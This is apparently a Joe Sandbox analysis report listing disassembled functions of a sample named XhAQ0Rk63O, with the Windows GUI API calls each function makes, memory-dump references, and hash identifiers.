                                                                                          • GetDesktopWindow.USER32 ref: 00454708
                                                                                          • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                          • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                          • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                          • String ID:
                                                                                          • API String ID: 3869813825-0
                                                                                          • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                          • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                          • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                          • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                          Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                          • GetCursorInfo.USER32 ref: 00458E03
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Cursor$Load$Info
                                                                                          • String ID:
                                                                                          • API String ID: 2577412497-0
                                                                                          • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                          • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                          • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                          • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                          Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                          • GetFocus.USER32 ref: 004696E0
                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$CtrlFocus
                                                                                          • String ID: 0
                                                                                          • API String ID: 1534620443-4108050209
                                                                                          • Opcode ID: a7e7dd4ad94bd17b8779821b2562c3e74f4a4d43059232d4a161c8df91f382bc
                                                                                          • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                          • Opcode Fuzzy Hash: a7e7dd4ad94bd17b8779821b2562c3e74f4a4d43059232d4a161c8df91f382bc
                                                                                          • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                          Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00468107
                                                                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                          • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                          • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                          • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                          • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                          • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                          • GetMenuItemCount.USER32 ref: 004682DC
                                                                                          • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                          • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                          • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                          • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 3993528054-4108050209
                                                                                          • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                          • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                          • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                          • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                          Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                            • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                            • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                            • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                          • SendMessageW.USER32(?), ref: 0046F34C
                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                          • _wcscat.LIBCMT ref: 0046F3BC
                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                          • DragFinish.SHELL32(?), ref: 0046F414
                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                          • API String ID: 4085615965-3440237614
                                                                                          • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                          • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                          • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                          • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                          Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll
                                                                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                          • API String ID: 3832890014-4202584635
                                                                                          • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                          • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                          • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                          • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                          Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 004669C4
                                                                                          • _wcsncpy.LIBCMT ref: 00466A21
                                                                                          • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • _wcstok.LIBCMT ref: 00466A90
                                                                                            • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                          • _wcstok.LIBCMT ref: 00466B3F
                                                                                          • _wcscpy.LIBCMT ref: 00466BC8
                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                          • _wcslen.LIBCMT ref: 00466D1D
                                                                                          • _memset.LIBCMT ref: 00466BEE
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • _wcslen.LIBCMT ref: 00466D4B
                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                          • String ID: X$HH
                                                                                          • API String ID: 3021350936-1944015008
                                                                                          • Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                          • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                          • Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                          • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                          Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0045F4AE
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                          • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoItemMenu$Sleep_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 1504565804-4108050209
                                                                                          • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                          • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                          • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                          • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                          Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateDestroy
                                                                                          • String ID: ,$tooltips_class32
                                                                                          • API String ID: 1109047481-3856767331
                                                                                          • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                          • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                          • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                          • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                          Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                          • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                          • _wcscat.LIBCMT ref: 0045CD51
                                                                                          • _wcscat.LIBCMT ref: 0045CD63
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                            • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                          • _wcscpy.LIBCMT ref: 0045CE14
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1153243558-438819550
                                                                                          • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                          • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                          • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                          • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                          Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00455127
                                                                                          • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                          • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                          • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                          • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                          • DrawMenuBar.USER32 ref: 00455207
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 1663942905-4108050209
                                                                                          • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                          • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                          • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                          • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                          Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1481289235-0
                                                                                          • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                          • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                          • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                          • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                          Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                          • SendMessageW.USER32 ref: 0046FBAF
                                                                                          • SendMessageW.USER32 ref: 0046FBE2
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                          • SendMessageW.USER32 ref: 0046FD00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
